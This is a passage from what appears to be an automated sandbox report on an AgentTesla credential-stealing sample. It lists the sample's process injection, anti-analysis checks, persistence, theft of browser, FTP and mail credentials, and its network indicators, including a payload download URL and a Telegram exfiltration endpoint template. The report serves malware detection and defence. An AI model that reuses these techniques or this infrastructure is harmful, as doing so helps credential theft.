            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F85875 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F82BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F84D47 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_01134D47 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_01131D69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_01131D6C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_01135875 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0113148C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_011358A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_011350F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_01131B25 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_01132BAC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\PO_010-240.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 960000
            Source: C:\Users\user\sore\PREIMBUED.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F80000
            Source: C:\Users\user\sore\PREIMBUED.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1130000
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO_010-240.exe'
            Source: C:\Users\user\sore\PREIMBUED.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: C:\Users\user\sore\PREIMBUED.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: RegAsm.exe, 00000008.00000002.1278698422.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000008.00000002.1278698422.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000008.00000002.1278698422.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000008.00000002.1278698422.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: unknown VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6264, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6072, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6264, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6072, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6264, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6072, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection112Obfuscated Files or Information1Input Capture11Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1DLL Side-Loading1Credentials in Registry1Security Software Discovery531SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSVirtualization/Sandbox Evasion34Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion34LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 322367 Sample: PO_010-240.exe Startdate: 25/11/2020 Architecture: WINDOWS Score: 100 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 6 other signatures 2->45 7 PREIMBUED.exe 1 2->7         started        10 PO_010-240.exe 1 2->10         started        12 PREIMBUED.exe 1 2->12         started        process3 signatures4 47 Multi AV Scanner detection for dropped file 7->47 49 Writes to foreign memory regions 7->49 51 Tries to detect Any.run 7->51 14 RegAsm.exe 15 10 7->14         started        53 Hides threads from debuggers 10->53 18 RegAsm.exe 1 11 10->18         started        21 RegAsm.exe 1 12->21         started        process5 dnsIp6 31 mail.jtceh.com 14->31 33 elb097307-934924932.us-east-1.elb.amazonaws.com 184.73.247.141, 443, 49737 AMAZON-AESUS United States 14->33 37 2 other IPs or domains 14->37 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->55 57 Tries to steal Mail credentials (via file access) 14->57 59 Tries to harvest and steal ftp login credentials 14->59 67 3 other signatures 14->67 23 conhost.exe 14->23         started        35 jtceh.com 162.213.255.53, 443, 49723, 49729 NAMECHEAP-NETUS United States 18->35 29 C:\Users\user\sore\PREIMBUED.exe, PE32 18->29 dropped 61 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->61 63 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->63 65 Tries to detect Any.run 18->65 25 conhost.exe 18->25         started        27 conhost.exe 21->27         started        file7 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO_010-240.exe20%VirustotalBrowse
            PO_010-240.exe41%ReversingLabsWin32.Trojan.Wacatac

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\sore\PREIMBUED.exe41%ReversingLabsWin32.Trojan.Wacatac

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://ve2IyZTobSOfG5Vf.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            http://DuWwST.com0%Avira URL Cloudsafe
            http://mail.jtceh.com0%Avira URL Cloudsafe
            https://jtceh.com/oficework_AJmKD179.bin0%Avira URL Cloudsafe
            http://ocsp.sectigo.com0#0%URL Reputationsafe
            http://ocsp.sectigo.com0#0%URL Reputationsafe
            http://ocsp.sectigo.com0#0%URL Reputationsafe
            https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
            https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
            https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elb097307-934924932.us-east-1.elb.amazonaws.com
            184.73.247.141
            truefalse
              high
              mail.jtceh.com
              162.213.255.53
              truetrue
                unknown
                jtceh.com
                162.213.255.53
                truetrue
                  unknown
                  api.ipify.org
                  unknown
                  unknownfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                      high
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#RegAsm.exe, 00000008.00000003.518140961.000000000135A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://api.ipify.orgRegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                        high
                        http://DynDns.comDynDNSRegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://sectigo.com/CPS0RegAsm.exe, 00000008.00000003.518140961.000000000135A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ve2IyZTobSOfG5Vf.comRegAsm.exe, 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://DuWwST.comRegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://mail.jtceh.comRegAsm.exe, 00000008.00000002.1283623530.000000001DEDC000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                          high
                          https://jtceh.com/oficework_AJmKD179.binRegAsm.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://secure.comodo.com/CPS0RegAsm.exe, 00000008.00000003.488927857.0000000000EC1000.00000004.00000001.sdmpfalse
                            high
                            https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xRegAsm.exe, 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                              high
                              http://ocsp.sectigo.com0#RegAsm.exe, 00000008.00000003.518140961.000000000135A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://api.ipify.orgGETMozilla/5.0RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              162.213.255.53
                              unknownUnited States
                              22612NAMECHEAP-NETUStrue
                              184.73.247.141
                              unknownUnited States
                              14618AMAZON-AESUSfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:322367
                              Start date:25.11.2020
                              Start time:03:41:43
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 31s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:PO_010-240.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:40
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@12/2@5/2
                              EGA Information:
                              • Successful, ratio: 83.3%
                              HDC Information:
                              • Successful, ratio: 40.5% (good quality ratio 14.9%)
                              • Quality average: 22%
                              • Quality standard deviation: 32.6%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.147.198.201, 51.104.139.180, 2.20.84.85, 20.54.26.129, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.190.129.129, 20.190.129.18, 20.190.129.134, 20.190.129.23, 40.126.1.167, 20.190.129.16, 20.190.129.1, 40.126.1.135, 93.184.220.29, 51.104.136.2, 51.11.168.232, 20.190.129.19, 40.126.1.145, 20.190.129.160, 40.126.1.128, 20.190.129.133, 20.190.129.128, 40.126.1.142, 20.190.129.130, 51.11.168.160
                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                              • Execution Graph export aborted for target RegAsm.exe, PID 6432 because there are no executed function
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              03:42:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce PROLOGISIN C:\Users\user\sore\PREIMBUED.exe
                              03:42:53API Interceptor3317x Sleep call for process: RegAsm.exe modified
                              03:42:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce PROLOGISIN C:\Users\user\sore\PREIMBUED.exe

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              184.73.247.141phy__1__31629__2649094674__1605642612.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              h5I9F5YQyX.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              14RP4w9CuA.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              FACTURA PENDIENTE.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              Swift Copy_G3181992.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              Haruko Industrial Supply offer.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              SKM__C20192910887888001990.pdf.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              5fNtovgDmX.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              1104_83924.xlsbGet hashmaliciousBrowse
                              • api.ipify.org/
                              OZmn6gKEgi.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              E099874321.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              BL2648372240.xls.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              ZAzoeb7NY6.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              7Pkuj1axGK.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              35pDlzhl45.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              B3T7eh73ok.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              Payment.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              pqE2Ika4EY.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              QN27UyUjZ5.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              kDIdm73DV3.exeGet hashmaliciousBrowse
                              • api.ipify.org/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              elb097307-934924932.us-east-1.elb.amazonaws.comINV+PL+BL-201BD.exeGet hashmaliciousBrowse
                              • 174.129.214.20
                              aguerox.exeGet hashmaliciousBrowse
                              • 54.225.66.103
                              dchampfrndx.exeGet hashmaliciousBrowse
                              • 50.19.252.36
                              dchamp.exeGet hashmaliciousBrowse
                              • 23.21.42.25
                              mazx.exeGet hashmaliciousBrowse
                              • 23.21.42.25
                              henryx.exeGet hashmaliciousBrowse
                              • 23.21.252.4
                              red split PO.exeGet hashmaliciousBrowse
                              • 54.235.83.248
                              1fIsVcdC6S.exeGet hashmaliciousBrowse
                              • 23.21.42.25
                              SecuriteInfo.com.Artemis770794B83E35.exeGet hashmaliciousBrowse
                              • 54.235.142.93
                              MIC Taiwan RFQ.docGet hashmaliciousBrowse
                              • 54.243.164.148
                              Bc.exeGet hashmaliciousBrowse
                              • 54.225.169.28
                              Scan documents 9930388.exeGet hashmaliciousBrowse
                              • 54.235.142.93
                              SecuriteInfo.com.Trojan.PackedNET.469.3076.exeGet hashmaliciousBrowse
                              • 50.19.252.36
                              Response_to_Motion_to_Vacate.docGet hashmaliciousBrowse
                              • 174.129.214.20
                              vQau1zZe6u.exeGet hashmaliciousBrowse
                              • 174.129.214.20
                              B2gnon0xfg.exeGet hashmaliciousBrowse
                              • 23.21.126.66
                              NoiUFFfAOH.exeGet hashmaliciousBrowse
                              • 23.21.42.25
                              extracted.exeGet hashmaliciousBrowse
                              • 54.235.142.93
                              QBPOS Receipt 57858.exeGet hashmaliciousBrowse
                              • 54.235.142.93
                              Order# BP254903820003.xls.exeGet hashmaliciousBrowse
                              • 54.204.14.42

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              NAMECHEAP-NETUSEME.39134.xlsxGet hashmaliciousBrowse
